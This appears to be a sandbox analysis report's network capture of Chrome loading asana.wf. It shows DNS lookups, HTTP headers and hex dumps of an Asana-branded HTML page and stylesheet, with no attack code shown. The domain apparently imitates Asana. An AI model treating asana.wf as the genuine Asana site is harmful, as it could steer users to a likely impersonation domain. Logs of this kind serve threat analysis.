                                                                                                                                                                                                                    Apr 25, 2024 21:55:18.855324984 CEST1.1.1.1192.168.2.160xf473No error (0)www.google.com108.177.122.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Apr 25, 2024 21:55:18.855324984 CEST1.1.1.1192.168.2.160xf473No error (0)www.google.com108.177.122.103A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Apr 25, 2024 21:55:18.855324984 CEST1.1.1.1192.168.2.160xf473No error (0)www.google.com108.177.122.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Apr 25, 2024 21:55:18.855324984 CEST1.1.1.1192.168.2.160xf473No error (0)www.google.com108.177.122.99A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Apr 25, 2024 21:55:18.855357885 CEST1.1.1.1192.168.2.160x318bNo error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                    Apr 25, 2024 21:56:14.696727037 CEST1.1.1.1192.168.2.160x39ccNo error (0)www.virustotal.comghs-svc-https-c46.ghs-ssl.googlehosted.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                    Apr 25, 2024 21:56:14.696727037 CEST1.1.1.1192.168.2.160x39ccNo error (0)ghs-svc-https-c46.ghs-ssl.googlehosted.com74.125.34.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Apr 25, 2024 21:56:14.697601080 CEST1.1.1.1192.168.2.160x8d54No error (0)www.virustotal.comghs-svc-https-c46.ghs-ssl.googlehosted.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                    Apr 25, 2024 21:56:20.778460979 CEST1.1.1.1192.168.2.160x83c6No error (0)www.virustotal.comghs-svc-https-c46.ghs-ssl.googlehosted.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                    Apr 25, 2024 21:56:20.778460979 CEST1.1.1.1192.168.2.160x83c6No error (0)ghs-svc-https-c46.ghs-ssl.googlehosted.com74.125.34.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Apr 25, 2024 21:56:20.781810045 CEST1.1.1.1192.168.2.160x5107No error (0)www.virustotal.comghs-svc-https-c46.ghs-ssl.googlehosted.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    0192.168.2.164969794.131.101.65802940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    Apr 25, 2024 21:54:54.338808060 CEST423OUTGET / HTTP/1.1
                                                                                                                                                                                                                    Host: asana.wf
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Apr 25, 2024 21:54:54.472430944 CEST553INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:54:54 GMT
                                                                                                                                                                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                    Location: https://asana.wf/
                                                                                                                                                                                                                    Content-Length: 299
                                                                                                                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 73 61 6e 61 2e 77 66 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 73 61 6e 61 2e 77 66 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://asana.wf/">here</a>.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at asana.wf Port 80</address></body></html>


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    1192.168.2.164969894.131.101.65802940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    Apr 25, 2024 21:55:39.352046967 CEST6OUTData Raw: 00
                                                                                                                                                                                                                    Data Ascii:


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    2192.168.2.164969994.131.101.65802940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    Apr 25, 2024 21:55:39.415062904 CEST6OUTData Raw: 00
                                                                                                                                                                                                                    Data Ascii:


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    0192.168.2.164970094.131.101.654432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:54:55 UTC651OUTGET / HTTP/1.1
                                                                                                                                                                                                                    Host: asana.wf
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                    Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                    Sec-Fetch-User: ?1
                                                                                                                                                                                                                    Sec-Fetch-Dest: document
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    2024-04-25 19:54:55 UTC276INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:54:55 GMT
                                                                                                                                                                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                    Last-Modified: Wed, 24 Apr 2024 12:43:17 GMT
                                                                                                                                                                                                                    ETag: "76d4d-616d703c74d3f"
                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                    Content-Length: 486733
                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                    2024-04-25 19:54:55 UTC7916INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 3c 73 74 79 6c 65 20 69 64 3d 27 68 70 5f 30 30 32 5f 61 61 5f 73 74 79 6c 65 27 3e 0a 20 20 20 20 2e 68 70 5f 30 30 32 5f 61 61 5f 76 20 7b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 7d 0a 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 20 69 64 3d 27 74 65 6d 5f 30 30 33 5f 69 63 6f 6e 5f 6c 69 6e 6b 5f 72 65 6d 6f 76 61 6c 5f 73 74 79 6c 65 27 3e 0a 20 20 20 20 2e 74 65 6d 5f 30 30 33 5f 69 63 6f 6e 5f 6c 69 6e 6b 5f 72 65 6d 6f 76 61 6c 5f 76 20 7b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 7d 0a 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 3c 73 74 79
                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <style id='hp_002_aa_style'> .hp_002_aa_v { display: none; } </style> <style id='tem_003_icon_link_removal_style'> .tem_003_icon_link_removal_v { display: none; } </style> <sty
                                                                                                                                                                                                                    2024-04-25 19:54:55 UTC8000INData Raw: 20 30 2d 2e 34 33 35 2e 34 31 34 68 2d 2e 30 30 33 76 31 2e 31 30 39 63 2d 31 2e 31 37 38 2d 31 2e 34 35 32 2d 33 2e 30 33 35 2d 32 2e 30 35 35 2d 34 2e 38 39 37 2d 32 2e 30 35 35 61 37 2e 36 36 38 20 37 2e 36 36 38 20 30 20 30 20 30 2d 37 2e 36 36 35 20 37 2e 36 37 63 30 20 34 2e 32 33 37 20 33 2e 34 33 32 20 37 2e 36 37 32 20 37 2e 36 36 35 20 37 2e 36 37 32 20 31 2e 38 36 32 20 30 20 33 2e 38 39 32 2d 2e 37 32 33 20 34 2e 38 39 37 2d 32 2e 30 35 34 76 2e 30 30 32 5a 6d 2d 34 2e 38 39 2d 2e 36 33 33 63 2d 32 2e 36 39 32 20 30 2d 34 2e 38 37 34 2d 32 2e 32 33 32 2d 34 2e 38 37 34 2d 34 2e 39 38 36 20 30 2d 32 2e 37 35 34 20 32 2e 31 38 32 2d 34 2e 39 38 36 20 34 2e 38 37 35 2d 34 2e 39 38 36 20 32 2e 36 39 32 20 30 20 34 2e 38 37 34 20 32 2e 32 33 32 20
                                                                                                                                                                                                                    Data Ascii: 0-.435.414h-.003v1.109c-1.178-1.452-3.035-2.055-4.897-2.055a7.668 7.668 0 0 0-7.665 7.67c0 4.237 3.432 7.672 7.665 7.672 1.862 0 3.892-.723 4.897-2.054v.002Zm-4.89-.633c-2.692 0-4.874-2.232-4.874-4.986 0-2.754 2.182-4.986 4.875-4.986 2.692 0 4.874 2.232
                                                                                                                                                                                                                    2024-04-25 19:54:55 UTC8000INData Raw: 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 73 73 2d 73 35 73 36 6b 6f 20 65 31 38 39 34 31 34 6b 33 22 3e 4a 6f 69 6e 20 75 73 3a 20 4c 65 61 72 6e 20 68 6f 77 20 74 6f 20 62 75 69 6c 64 20 61 20 74 72 75 73 74 65 64 20 41 49 20 73 74 72 61 74 65 67 79 20 74 6f 20 73 75 70 70 6f 72 74 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 79 6f 75 72 20 63 6f 6d 70 61 6e 79 26 23 78 32 37 3b 73 20 69 6e 74 65 6c 6c 69 67 65 6e 74 20 74 72 61 6e 73 66 6f 72 6d 61 74 69 6f 6e 2c 20 66 65 61 74 75 72 69 6e 67 20 46 6f 72 72 65 73 74 65 72 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 64 61 74 61
                                                                                                                                                                                                                    Data Ascii: } } </style><span class="css-s5s6ko e189414k3">Join us: Learn how to build a trusted AI strategy to support your company&#x27;s intelligent transformation, featuring Forrester</span> <style data
                                                                                                                                                                                                                    2024-04-25 19:54:55 UTC8000INData Raw: 63 73 73 2d 31 6a 6d 76 35 71 6b 3a 64 69 73 61 62 6c 65 64 3a 68 6f 76 65 72 20 73 76 67 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2e 63 73 73 2d 31 6a 6d 76 35 71 6b 3a 64 69 73 61 62 6c 65 64 3a 68 6f 76 65 72 3a 68 6f 76 65 72 20 73 76 67 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2e 63 73 73 2d 31 6a 6d 76 35 71 6b 3a 64 69 73 61 62 6c 65 64 3a 61 63 74 69 76 65 3a 68 6f 76 65 72 20 73 76 67 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2e 63 73 73 2d 31 6a 6d 76 35 71 6b 3a 64 69 73 61 62 6c 65 64 20 70 61 74 68 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2e 63 73 73 2d 31 6a 6d 76 35 71 6b 3a 64 69 73 61 62 6c 65 64 3a 68 6f 76 65 72 20 70 61 74 68 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2e 63 73 73 2d 31 6a 6d 76 35 71 6b
                                                                                                                                                                                                                    Data Ascii: css-1jmv5qk:disabled:hover svg, .css-1jmv5qk:disabled:hover:hover svg, .css-1jmv5qk:disabled:active:hover svg, .css-1jmv5qk:disabled path, .css-1jmv5qk:disabled:hover path, .css-1jmv5qk
                                                                                                                                                                                                                    2024-04-25 19:54:55 UTC8000INData Raw: 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 72 6f 77 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 72 6f 77 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: display: -webkit-flex; display: -ms-flexbox; display: flex; -webkit-flex-direction: row; -ms-flex-direction: row;
                                                                                                                                                                                                                    2024-04-25 19:54:55 UTC8000INData Raw: 6f 77 6e 5f 5f 63 61 72 64 2d 6c 61 62 65 6c 20 2d 6e 61 76 2d 64 72 6f 70 6f 64 6f 77 6e 2d 6d 6f 62 69 6c 65 20 63 73 73 2d 31 65 69 6d 76 62 65 22 3e 41 70 70 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 6e 74 65 67 72 61 74 69 6f 6e 73 3c 2f 73 70 61 6e 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 75 6c 3e 0a 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: own__card-label -nav-dropodown-mobile css-1eimvbe">App integrations</span></div> </div> </a></li> </ul>
                                                                                                                                                                                                                    2024-04-25 19:54:55 UTC8000INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 6f 6c 65 3d 22 70 72 65 73 65 6e 74 61 74 69 6f 6e 22 3e 3c 61 20 61 72 69 61 2d 70 6f 73 69 6e 73 65 74 3d 22 34 22 20 61 72 69 61 2d 73 65 74 73 69 7a 65 3d 22 32 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 61 72 69 61 2d 64 65 73 63 72 69 62 65 64 62 79 3d 22 6e 61 76 2d 63 61 72 64 2d 74 61 73 6b 73 22 20 68 72 65 66 3d 22 23 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6c 61 73 73 3d 22 6e 61 76 69 67 61 74 69 6f 6e 5f 5f 64 72 6f 70 64 6f 77 6e 5f 5f 63 61 72 64 2d 6c 69 6e 6b 20 63 73 73 2d 30 22 3e 0a 20 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: role="presentation"><a aria-posinset="4" aria-setsize="20" aria-describedby="nav-card-tasks" href="#" class="navigation__dropdown__card-link css-0">
                                                                                                                                                                                                                    2024-04-25 19:54:55 UTC8000INData Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6c 61 73 73 3d 22 6e 61 76 69 67 61 74 69 6f 6e 5f 5f 64 72 6f 70 64 6f 77 6e 5f 5f 63 61 72 64 2d 6c 61 62 65 6c 20 2d 6e 61 76 2d 64 72 6f 70 6f 64 6f 77 6e 2d 6d 6f 62 69 6c 65 20 63 73 73 2d 77 72 36 7a 39 79 22 3e 50 6f 72 74 66 6f 6c 69 6f 73 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: class="navigation__dropdown__card-label -nav-dropodown-mobile css-wr6z9y">Portfolios</span> </div> </div>
                                                                                                                                                                                                                    2024-04-25 19:54:55 UTC8000INData Raw: 5f 5f 63 61 72 64 2d 2d 73 69 6d 70 6c 69 66 69 63 61 74 69 6f 6e 20 63 73 73 2d 6f 34 65 6a 70 63 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 61 72 69 61 2d 64 65 73 63 72 69 62 65 64 62 79 3d 22 6d 61 69 6e 2d 6d 65 6e 75 2d 68 65 6c 70 2d 31 20 6d 61 69 6e 2d 6d 65 6e 75 2d 68 65 6c 70 2d 32 20 6d 61 69 6e 2d 6d 65 6e 75 2d 68 65 6c 70 2d 33 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 61 76 69 67 61 74 69 6f 6e 5f 5f 64 72 6f 70 64 6f 77 6e 5f 5f 63 61 72 64 2d 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 3c 73 70 61 6e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: __card--simplification css-o4ejpc" aria-describedby="main-menu-help-1 main-menu-help-2 main-menu-help-3"> <div class="navigation__dropdown__card-description"><span
                                                                                                                                                                                                                    2024-04-25 19:54:55 UTC8000INData Raw: 65 6e 75 2d 68 65 6c 70 2d 33 22 3e 3c 73 76 67 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6c 61 73 73 3d 22 69 63 6f 6e 2d 73 76 67 20 69 63 6f 6e 2d 73 76 67 2d 2d 62 61 73 69 63 20 69 63 6f 6e 2d 2d 70 75 72 70 6c 65 22 20 77 69 64 74 68 3d 22 31 30 22 20 68 65 69 67 68 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 33 32 20 33 32 22 20 70 72 65 73 65 72 76 65 41 73 70 65 63 74 52 61 74 69 6f 3d 22 78 4d 69 6e 59 4d 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: enu-help-3"><svg class="icon-svg icon-svg--basic icon--purple" width="10" height="10" viewBox="0 0 32 32" preserveAspectRatio="xMinYMin">


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    1192.168.2.164970294.131.101.654432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:54:55 UTC540OUTGET /css/reskin-0451c4949d.css HTTP/1.1
                                                                                                                                                                                                                    Host: asana.wf
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: style
                                                                                                                                                                                                                    Referer: https://asana.wf/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    2024-04-25 19:54:56 UTC277INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:54:55 GMT
                                                                                                                                                                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                    Last-Modified: Wed, 17 Apr 2024 18:44:03 GMT
                                                                                                                                                                                                                    ETag: "11d8b2-6164f3d1555f1"
                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                    Content-Length: 1169586
                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Content-Type: text/css
                                                                                                                                                                                                                    2024-04-25 19:54:56 UTC7915INData Raw: 40 63 68 61 72 73 65 74 20 22 55 54 46 2d 38 22 3b 0a 2f 2a 20 73 74 79 6c 65 6c 69 6e 74 2d 64 69 73 61 62 6c 65 20 2a 2f 0a 2f 2a 21 20 73 61 6e 69 74 69 7a 65 2e 63 73 73 20 76 35 2e 30 2e 30 20 7c 20 43 43 30 20 4c 69 63 65 6e 73 65 20 7c 20 67 69 74 68 75 62 2e 63 6f 6d 2f 6a 6f 6e 61 74 68 61 6e 74 6e 65 61 6c 2f 73 61 6e 69 74 69 7a 65 2e 63 73 73 20 2a 2f 0a 2f 2a 20 44 6f 63 75 6d 65 6e 74 20 28 0a 20 20 20 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 20 2a 2f 0a 2f 2a 2a 0a 20 2a 20 31 2e 20 52 65 6d 6f 76 65 20 72 65 70 65 61 74 69 6e 67 20 62 61 63 6b 67 72 6f 75 6e 64
                                                                                                                                                                                                                    Data Ascii: @charset "UTF-8";/* stylelint-disable *//*! sanitize.css v5.0.0 | CC0 License | github.com/jonathantneal/sanitize.css *//* Document ( ========================================================================== *//** * 1. Remove repeating background
                                                                                                                                                                                                                    2024-04-25 19:54:56 UTC8000INData Raw: 6c 65 20 69 6e 20 53 61 66 61 72 69 2e 0a 20 2a 2f 0a 5b 74 79 70 65 3d 73 65 61 72 63 68 5d 20 7b 0a 20 20 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 20 74 65 78 74 66 69 65 6c 64 3b 20 2f 2a 20 31 20 2a 2f 0a 20 20 6f 75 74 6c 69 6e 65 2d 6f 66 66 73 65 74 3a 20 2d 32 70 78 3b 20 2f 2a 20 32 20 2a 2f 0a 7d 0a 0a 2f 2a 2a 0a 20 2a 20 52 65 6d 6f 76 65 20 74 68 65 20 69 6e 6e 65 72 20 70 61 64 64 69 6e 67 20 61 6e 64 20 63 61 6e 63 65 6c 20 62 75 74 74 6f 6e 73 20 69 6e 20 43 68 72 6f 6d 65 20 61 6e 64 20 53 61 66 61 72 69 20 6f 6e 20 6d 61 63 4f 53 2e 0a 20 2a 2f 0a 5b 74 79 70 65 3d 73 65 61 72 63 68 5d 3a 3a 2d 77 65 62 6b 69 74 2d 73 65 61 72 63 68 2d 63 61 6e 63 65 6c 2d 62 75 74 74 6f 6e 2c 0a 5b 74 79 70 65 3d 73 65 61 72 63 68 5d 3a
                                                                                                                                                                                                                    Data Ascii: le in Safari. */[type=search] { -webkit-appearance: textfield; /* 1 */ outline-offset: -2px; /* 2 */}/** * Remove the inner padding and cancel buttons in Chrome and Safari on macOS. */[type=search]::-webkit-search-cancel-button,[type=search]:
                                                                                                                                                                                                                    2024-04-25 19:54:56 UTC8000INData Raw: 20 33 32 70 78 3b 0a 20 20 70 61 64 64 69 6e 67 3a 20 31 36 70 78 20 33 32 70 78 3b 0a 7d 0a 0a 63 6f 64 65 2c 0a 70 72 65 20 7b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 36 46 38 46 39 3b 0a 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 35 44 43 45 30 3b 0a 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 33 70 78 3b 0a 7d 0a 0a 70 20 63 6f 64 65 20 7b 0a 20 20 70 61 64 64 69 6e 67 3a 20 33 70 78 20 34 70 78 20 31 70 78 3b 0a 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 35 25 3b 0a 7d 0a 0a 70 72 65 20 63 6f 64 65 20 7b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 6e 6f 6e 65 3b 0a 20 20 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 0a 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 7d 0a 0a
                                                                                                                                                                                                                    Data Ascii: 32px; padding: 16px 32px;}code,pre { background-color: #F6F8F9; border: 1px solid #D5DCE0; border-radius: 3px;}p code { padding: 3px 4px 1px; vertical-align: 5%;}pre code { background-color: none; border: none; padding: 0;}
